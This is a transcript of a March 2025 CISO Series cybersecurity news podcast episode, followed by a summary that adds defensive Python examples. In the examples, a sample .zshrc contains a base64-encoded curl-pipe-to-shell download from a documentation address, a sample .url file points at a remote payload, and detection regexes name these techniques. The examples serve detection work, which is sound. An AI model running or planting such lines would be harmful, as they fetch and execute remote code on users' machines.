
A
From the CISO series, it's Cybersecurity Headlines.
B
These are the cybersecurity headlines for Wednesday, March 12, 2025. I'm Rich Stroffolino.

Sean Plankey nominated to head CISA. According to a list of nominations sent to Congress, President Trump tapped Sean Plankey to lead the U.S. cyber agency. Plankey previously served as the CIO of the U.S. Navy, as the White House's Director of Cyber Policy during the first Trump administration, and as the Principal Deputy Assistant Secretary for the Energy Department's Office of Cybersecurity, Energy Security, and Emergency Response in 2019 and 2020. The nomination now goes before the Senate Homeland Security Committee and is not expected to face significant pushback.

Ballista botnet hits TP-Link devices. A new report from the Cato CTRL team details how threat actors are exploiting a high-severity command injection vulnerability to execute code on TP-Link Archer AX21 routers to ultimately deploy the botnet. The flaw isn't new; the first evidence of exploitation dates back to April 2023. The researchers saw the campaign using the flaw in January 2025. The attackers used a shell script to execute a malware binary across various system architectures, which opens the door to remote code execution or denial of service, the researchers noted. The malware can erase itself once execution begins to cover its tracks, while also spreading to other devices. Newer Ballista variants use Tor network domains rather than hard-coded IP addresses, indicating it's under active development. Researchers at Censys found that Ballista infected over 6,000 devices across Brazil, Poland, the UK, Bulgaria, and Turkey.

PowerSchool publishes breach report. The education software giant released CrowdStrike's investigation into its December 2024 breach. This showed signs that the company was initially breached in August 2024 and then again in September, prior to the December breach, and it's not clear if the same threat actor was responsible for either of the two prior breaches. The December attack exfiltrated teachers' and students' data using compromised credentials, but researchers did not see evidence that the attackers accessed other company databases. There was also no evidence the attackers moved laterally in their network or downstream to any school systems directly. As of January 2025, CrowdStrike found no evidence that threat actors published any data from the breach after being paid a ransom. PowerSchool has not confirmed how many students were impacted by the attacks.

Allstate sued for back-to-back breaches. The New York State Attorney General's office filed a lawsuit against the insurance company and several of its subsidiaries, accusing them of poor cybersecurity practices that led to data breaches in 2020 and 2021. Both attacks exploited an auto insurance quoting tool from the company National General, which Allstate acquired in 2021, exposing almost 200,000 driver's license numbers. The lawsuit said the tool populated driver's license numbers in plain text, something not fixed after the first breach. Allstate says it notified regulators and fixed the issue promptly, offering credit monitoring services to those impacted.

And now, thanks to today's episode sponsor, Vanta. Do you know the status of your compliance controls right now? Like, right now? We know that real-time visibility is critical for security. When it comes to our GRC programs, we rely on point-in-time checks. But more than 9,000 companies have continuous visibility into their controls with Vanta. Vanta brings automation to evidence collection across 35 frameworks like SOC 2 and ISO 27001. They also centralize key workflows like policies, access reviews, and reporting, and help you get security questionnaires done five times faster with AI. Now that's a new way to GRC. Get started at vanta.com/headlines. That's V-A-N-T-A dot com slash headlines.

Blind Eagle flies high with URL files. Check Point Research released an advisory about a new campaign targeting government institutions and organizations in Colombia since November 2024. These attacks are attributed to the group Blind Eagle, also known as APT-C-36 for those that don't like cool names. This campaign distributes malicious URL files which trigger a WebDAV request when interacting with it in a specific way, which could start a second-stage payload download or execute other malicious actions. The group largely distributes malware through consumer services like Google Drive or Dropbox, but the researchers found them expanding to using Bitbucket and GitHub for payload hosting.

UK calls for improvements to open source supply chain security. A new report from the UK's Department for Science, Innovation and Technology, or DSIT, outlined weaknesses in the open source supply chain, citing a lack of industry-specific practices, a lack of a formal process for judging component trustworthiness, and the dominant influence of large tech companies as points of concern. As best-practice recommendations, organizations should create an internal OSS policy that details the criteria for evaluating the trustworthiness and maturity of OSS components, develop software bills of materials, or SBOMs, for their products, and actively engage and contribute to the open source community.

Suspected Garantex founder arrested. The crypto exchange Garantex was sanctioned by the U.S. government in 2022 for facilitating money laundering by criminal organizations. On March 7, the U.S. Department of Justice unsealed an indictment against its alleged founders Aleksandr Mira Serda and Aleksej Besciokov. At the same time, German and Finnish law enforcement seized servers used by the service. Sources speaking to Krebs on Security say that Indian officials apprehended Besciokov over the weekend. The DOJ charges Besciokov as the technical administrator maintaining the exchange's critical infrastructure.

Xcode malware learns new tricks. Researchers discovered the XCSSET malware in 2022, which infects Xcode projects on macOS and runs while the project is being built. Microsoft released details on a new variant with a number of improvements, including a modular infrastructure, encoded payloads, and improved error handling. It also uses scripting languages, Unix commands, and legitimate binaries to further lower its profile. The variant also obfuscates module names to make static analysis less effective, and includes three persistence approaches to launch a payload whenever a new shell session is initiated. Microsoft shared full details about this with Apple ahead of its publication, and published details on individual modules, which we've linked to in our show notes.

Remember to register for this week's Super Cyber Friday, which is all about hacking competitive GRC. We're sick of talking about GRC as a cost center or just a checkbox, so we're spending an hour discussing how GRC can be a competitive advantage. If you want more details, head on over to our events page at cisoseries.com to join us this Friday at 1pm Eastern for the discussion. You can join in our chat, play a few fun games, and even win some sweet CISO Series swag. We hope to see you there. Reporting for the CISO Series, I'm Rich Stroffolino, reminding you to have a super sparkly day.
A
Cybersecurity Headlines are available every weekday. Head to cisoseries.com for the full stories behind the headlines.
B
Boom boom boom.
Cyber Security Headlines – CISO Series Episode Summary
Release Date: March 12, 2025
Hosted by: Rich Stroffolino
In a significant move for U.S. cybersecurity leadership, Sean Plankey has been nominated by President Trump to head the Cybersecurity and Infrastructure Security Agency (CISA). As Rich Stroffolino reports, Plankey brings a wealth of experience to the role, having previously served as the Chief Information Officer (CIO) of the U.S. Navy and as the White House's Director of Cyber Policy during the first Trump administration. Additionally, he was the Principal Deputy Assistant Secretary for the Energy Department's Office of Cybersecurity, Energy Security, and Emergency Response from 2019 to 2020. Stroffolino notes, “The nomination now goes before the Senate Homeland Security Committee and is not expected to face significant pushback,” suggesting a smooth confirmation process ahead.
A new threat has emerged targeting TP-Link Archer AX21 routers through the Ballista botnet. According to a report from the Cato CTRL team, threat actors are exploiting a high-severity command injection vulnerability to execute code on the routers and deploy the botnet. The flaw itself is not new: the first evidence of exploitation dates back to April 2023, and the researchers observed this campaign using it in January 2025. The attackers use a shell script to run the malware binary across various system architectures, enabling remote code execution and potential denial of service. Notably, the malware is designed to erase itself once execution begins to cover its tracks, and it includes mechanisms to propagate to additional devices.
Researchers at Censys found that Ballista has compromised over 6,000 devices across countries including Brazil, Poland, the UK, Bulgaria, and Turkey. A notable development in newer Ballista variants is the shift from hard-coded IP addresses to Tor network domains, indicating ongoing evolution and active development by the threat actors.
PowerSchool, a leading education software provider, has published the results of CrowdStrike's investigation into its December 2024 breach. The investigation found signs that the company had already been breached in August 2024 and again in September, before the December incident. Rich Stroffolino summarizes, “The December attack exfiltrated teachers' and students' data using compromised credentials.” It remains unclear whether the same threat actor was responsible for the earlier intrusions.
Key findings include:
- The December attackers used compromised credentials to exfiltrate teacher and student data, but there is no evidence they accessed other company databases.
- There is no evidence of lateral movement within PowerSchool's network or downstream into any school systems directly.
- As of January 2025, CrowdStrike found no evidence that the threat actors published any of the stolen data after the ransom was paid.
- PowerSchool has yet to disclose the total number of students affected by these breaches.
New York's Attorney General has filed a lawsuit against Allstate and several of its subsidiaries over data breaches in 2020 and 2021. Both breaches exploited an auto insurance quoting tool from National General (acquired by Allstate in 2021), exposing nearly 200,000 driver's license numbers. The complaint alleges that the tool populated driver's license numbers in plain text and that this was not fixed after the first breach.
Following the initial breach, Allstate reportedly:
- notified regulators;
- fixed the issue promptly;
- offered credit monitoring services to those impacted.
The lawsuit underscores the repeated failure to secure sensitive data, prompting legal action from the state to hold the company accountable for its cybersecurity practices.
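The failure the complaint describes, a quoting tool that populated a driver's license number into the form in plain text, is an application design problem a developer can reason about directly: once a lookup keyed on name and address echoes the full number back to the browser, anyone who can guess or scrape names and addresses can harvest numbers at scale. The following is an added example written for this summary, not Allstate's or National General's code, and it says nothing about how their tool actually worked. It shows that pattern beside a version that keeps the number on the server, returns only a masked value to the client, and caps lookups per client. The records, names, postcodes and limits are constructed for the example.

```python
"""A quote-prefill lookup that echoes a licence number to the client, beside a
hardened version. Added example for this summary; not Allstate's or National
General's code. All records, names and limits below are constructed."""
from collections import defaultdict
from typing import Dict, Optional, Tuple

# Constructed sample data: (normalised name, postcode) -> driver's license number.
DRIVER_RECORDS = {
    ("jane doe", "10001"): "D12345678901234",
}


def _key(name: str, postcode: str) -> Tuple[str, str]:
    """Normalise the lookup key so spacing and case do not create misses."""
    return (" ".join(name.split()).lower(), postcode.strip())


def mask_license(number: str) -> str:
    """Keep only the last four characters: enough for a user to confirm it is theirs."""
    return "*" * max(len(number) - 4, 0) + number[-4:]


def prefill_vulnerable(name: str, postcode: str) -> Dict[str, str]:
    """The pattern the complaint describes: the full number is written into the
    quote form, so whoever can supply a name and address can read it out."""
    number = DRIVER_RECORDS.get(_key(name, postcode))
    return {"driver_license": number} if number else {}


class QuoteService:
    """Hardened version: the number is bound to the quote session on the server,
    the client only ever receives a masked value, and lookups per client are
    capped so that name-and-address enumeration is expensive."""

    def __init__(self, max_lookups_per_client: int = 5):
        self.max_lookups = max_lookups_per_client
        self._lookups: Dict[str, int] = defaultdict(int)
        self._sessions: Dict[str, Dict[str, str]] = {}

    def is_rate_limited(self, client_id: str) -> bool:
        return self._lookups[client_id] >= self.max_lookups

    def prefill(self, client_id: str, session_id: str,
                name: str, postcode: str) -> Dict[str, str]:
        if self.is_rate_limited(client_id):
            raise PermissionError("lookup limit reached for this client")
        self._lookups[client_id] += 1  # count misses too, or enumeration is free
        number = DRIVER_RECORDS.get(_key(name, postcode))
        if not number:
            return {}
        # The real value never leaves the server; it is tied to this quote session.
        self._sessions.setdefault(session_id, {})["driver_license"] = number
        return {"driver_license": mask_license(number)}

    def stored_license(self, session_id: str) -> Optional[str]:
        """Server-side consumer of the stored value, e.g. when the quote is bound."""
        return self._sessions.get(session_id, {}).get("driver_license")


if __name__ == "__main__":
    print("vulnerable:", prefill_vulnerable("Jane Doe", "10001"))
    svc = QuoteService(max_lookups_per_client=2)
    print("hardened:  ", svc.prefill("client-a", "quote-1", "Jane Doe", "10001"))
```

The masked value is what the form should display; the full number is only ever read server side through `stored_license` when the quote is actually bound. Counting misses against the limit matters as much as masking: an enumeration attack consists mostly of misses.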
Blind Eagle, also known as APT-C-36, has been running a new campaign against government institutions and organizations in Colombia since November 2024. Check Point Research detailed the campaign, revealing that the group distributes malicious URL files designed to trigger a WebDAV request when a user interacts with them in a specific way. That request can start the download of a second-stage payload or execute other malicious actions.
Key tactics employed by Blind Eagle include:
- Delivering malicious Windows URL files that trigger a WebDAV request on a specific user interaction.
- Using that request to fetch a second-stage payload or carry out other malicious actions.
- Distributing malware largely through consumer services such as Google Drive and Dropbox.
- Expanding to Bitbucket and GitHub for payload hosting.
The ongoing campaign highlights the persistent threat posed by advanced persistent threat (APT) groups to government institutions and the organizations that work with them.
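The delivery mechanism above, a Windows .url (Internet Shortcut) file whose fields point at a WebDAV or SMB host, is something a defender can check for on a mail gateway or a file share without opening the file. The following is an added example written for this summary, not Check Point's code and not a reproduction of the campaign's files: it parses a .url file as the INI-style text it is and flags fields that would make Windows contact a remote host. The sample file contents, the 198.51.100.7 documentation address and the choice of fields to inspect (URL, IconFile, WorkingDirectory) are assumptions made for the example; the report as summarized here does not say which field the campaign abuses.

```python
"""Flag Windows Internet Shortcut (.url) files that point at a remote host.

Added example for this summary, not Check Point's code. Which .url field the
Blind Eagle campaign abuses is not stated here, so the fields checked below
(URL, IconFile, WorkingDirectory) and the sample contents are assumptions.
"""
import configparser
import re
from typing import Dict, List, Optional
from urllib.parse import urlparse

# Constructed sample: an ordinary bookmark-style shortcut.
BENIGN_URL_FILE = r"""[InternetShortcut]
URL=https://example.com/docs/index.html
IconIndex=0
"""

# Constructed sample: a file:// target with a host (handed to the WebDAV/SMB
# redirector when opened) and an icon on a UNC path (resolved by Explorer while
# merely rendering the folder). 198.51.100.7 is a documentation address.
SUSPICIOUS_URL_FILE = r"""[InternetShortcut]
URL=file://198.51.100.7/DavWWWRoot/payload.exe
IconFile=\\198.51.100.7\share\icon.ico
IconIndex=0
"""

UNC_RE = re.compile(r"^\\\\[^\\]+\\")  # \\host\share\...


def _remote_reason(field: str, value: str) -> Optional[str]:
    """Return why this field value would make Windows contact a remote host, or None."""
    v = value.strip()
    if UNC_RE.match(v) or v.startswith("//"):
        return "UNC path to a remote host"
    parsed = urlparse(v)
    scheme = parsed.scheme.lower()
    if scheme == "file" and parsed.netloc:
        return "file:// URL with a remote host"
    # A web URL is the normal content of URL= (it just opens a browser). In the
    # other fields Explorer resolves it itself, which is not expected.
    if field != "URL" and scheme in ("http", "https"):
        return "web URL in a field Explorer resolves on its own"
    return None


def analyze_url_file(text: str) -> List[Dict[str, str]]:
    """Parse one .url file and return the fields that reference a remote host."""
    cp = configparser.ConfigParser(strict=False, interpolation=None)
    cp.optionxform = str  # keep field names as written; configparser lowercases by default
    cp.read_string(text)
    if not cp.has_section("InternetShortcut"):
        return []
    section = cp["InternetShortcut"]
    findings = []
    for field in ("URL", "IconFile", "WorkingDirectory"):
        if field not in section:
            continue
        reason = _remote_reason(field, section[field])
        if reason:
            findings.append({"field": field, "value": section[field], "reason": reason})
    return findings


if __name__ == "__main__":
    for label, contents in (("benign", BENIGN_URL_FILE), ("suspicious", SUSPICIOUS_URL_FILE)):
        print(label, analyze_url_file(contents))
```

Because `IconFile` is resolved when the containing folder is displayed, a hit in that field deserves more attention than a hit in `URL`, which still requires the user to open the shortcut. The check is deliberately format-level: it does not need to know the specific interaction the campaign relies on.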
The United Kingdom's Department for Science, Innovation and Technology (DSIT) has released a report addressing weaknesses in the open-source software (OSS) supply chain. The report identifies several key concerns:
- A lack of industry-specific practices.
- A lack of a formal process for judging the trustworthiness of components.
- The dominant influence of large tech companies.
DSIT's best-practice recommendations include:
- Creating an internal OSS policy that details the criteria for evaluating the trustworthiness and maturity of OSS components.
- Developing software bills of materials (SBOMs) for products.
- Actively engaging with and contributing to the open-source community.
These measures aim to enhance the overall security posture of the open-source ecosystem and mitigate risks associated with supply chain vulnerabilities.
In a crackdown on illicit cryptocurrency activities, the U.S. Department of Justice (DOJ) unsealed an indictment on March 7 against Garantex's alleged founders, Aleksandr Mira Serda and Aleksej Besciokov. Garantex had been sanctioned by the U.S. government in 2022 for facilitating money laundering for criminal organizations. Concurrently, German and Finnish law enforcement agencies seized servers used by the exchange.
Key developments include:
- Sources speaking to Krebs on Security say Indian officials apprehended Besciokov over the weekend.
- The DOJ charges Besciokov as the technical administrator who maintained the exchange's critical infrastructure.
This operation underscores the international efforts to dismantle crypto exchanges involved in financial crimes and enforce regulatory compliance within the digital currency landscape.
XCSSET, a malware identified in 2022 that infects Xcode projects on macOS and runs while the project is being built, has evolved with a new variant featuring significant enhancements. Rich Stroffolino details Microsoft's findings on the updated malware:
- A modular infrastructure, encoded payloads, and improved error handling.
- Use of scripting languages, Unix commands, and legitimate binaries to further lower its profile.
- Obfuscated module names that make static analysis less effective.
- Three persistence approaches that launch a payload whenever a new shell session is initiated.
Microsoft shared full details with Apple ahead of publication and has published details on the individual modules, linked in the show notes, aiding security professionals in mitigating this threat.
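The persistence detail above, a payload launched whenever a new shell session starts, means the shell's startup files are the place to look on a developer's Mac. The following audit is an added example for this summary, not Microsoft's detection logic and not XCSSET's own code: it scans the text of zsh/bash startup files for lines that fetch and pipe into a shell, decode base64 into eval, run scripts from dot-directories, or background a command at login, and it decodes embedded base64 literals so that an obfuscated line is judged on what it actually runs. The rule set, the file list and the sample ~/.zshrc (including its 198.51.100.7 address) are assumptions constructed for the example; the page does not describe the specific hooks the new variant uses.

```python
"""Audit shell startup files for lines that would launch a payload at each new session.

Added example for this summary; not Microsoft's or XCSSET's code. The rules,
file list and sample contents below are assumptions made for illustration.
"""
import base64
import os
import re
from typing import Dict, List, Optional

# Files read by zsh/bash when a login or interactive shell starts (assumption:
# the set a macOS audit would cover; extend for your environment).
STARTUP_FILES = (".zshenv", ".zprofile", ".zshrc", ".zlogin",
                 ".bash_profile", ".bashrc", ".profile")

# Constructed sample ~/.zshrc: three ordinary lines followed by two injected ones.
# The base64 literal decodes to a curl-pipe-sh fetch from a documentation address.
SAMPLE_ZSHRC = r"""
export PATH="$HOME/bin:$PATH"
alias ll='ls -la'
source "$HOME/.zshrc_aliases"
eval "$(echo 'Y3VybCAtcyBodHRwOi8vMTk4LjUxLjEwMC43L3AgfCBzaA==' | base64 -d)"
[ -f ~/.config/.hidden/.run.sh ] && sh ~/.config/.hidden/.run.sh &
"""

RULES = [
    ("remote fetch piped into a shell", re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b")),
    ("base64-decoded content executed", re.compile(r"\bbase64\s+(-d|-D|--decode)\b")),
    ("eval of generated command text", re.compile(r"\beval\s+\"?\$\(")),
    ("script run from a dot-directory",
     re.compile(r"(^|[\s;&|])(sh|bash|zsh|source|\.)\s+\S*/\.[^/\s]+/")),
    ("command backgrounded at shell start", re.compile(r"[^&]&\s*$")),
]

B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def _decode_embedded_base64(line: str) -> List[str]:
    """Decode base64-looking literals in a line when they yield printable ASCII."""
    decoded = []
    for match in B64_RE.finditer(line):
        try:
            text = base64.b64decode(match.group(0), validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue
        if text.isprintable():
            decoded.append(text)
    return decoded


def audit_text(text: str, source: str = "<inline>") -> List[Dict[str, object]]:
    """Return one finding per (line, rule) hit; decoded base64 payloads are audited too."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        for name, pattern in RULES:
            if pattern.search(line):
                findings.append({"source": source, "line": lineno, "rule": name, "text": stripped})
        for payload in _decode_embedded_base64(line):
            for name, pattern in RULES:
                if pattern.search(payload):
                    findings.append({"source": source, "line": lineno,
                                     "rule": "decoded payload: " + name, "text": payload})
    return findings


def audit_home(home: Optional[str] = None) -> List[Dict[str, object]]:
    """Audit whichever of STARTUP_FILES exist under a home directory."""
    home = home or os.path.expanduser("~")
    findings = []
    for name in STARTUP_FILES:
        path = os.path.join(home, name)
        if os.path.isfile(path):
            with open(path, encoding="utf-8", errors="replace") as fh:
                findings.extend(audit_text(fh.read(), source=path))
    return findings


if __name__ == "__main__":
    for f in audit_text(SAMPLE_ZSHRC, source="sample ~/.zshrc"):
        print(f"{f['source']}:{f['line']}: {f['rule']}: {f['text']}")
```

Run `audit_home()` on a real account to check the live files. The rules are heuristics and the `source` line in the sample deliberately goes unflagged: sourcing a dotfile in the home directory is normal, and an audit that fires on it would be ignored within a day.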
Conclusion
This episode of Cyber Security Headlines by CISO Series, hosted by Rich Stroffolino, provided a comprehensive overview of the latest developments in the cybersecurity landscape as of March 12, 2025. From significant leadership changes within federal cyber agencies to emerging threats like the Ballista botnet and advanced malware variants, the episode underscored the dynamic and evolving nature of cyber threats. Additionally, the discussions highlighted ongoing efforts to strengthen cybersecurity practices across industries, legal actions against negligent companies, and international collaborations to combat cybercrime. For those keen on staying informed about critical cybersecurity issues, this episode offers valuable insights and actionable information.
For more detailed stories and updates, visit cisoseries.com.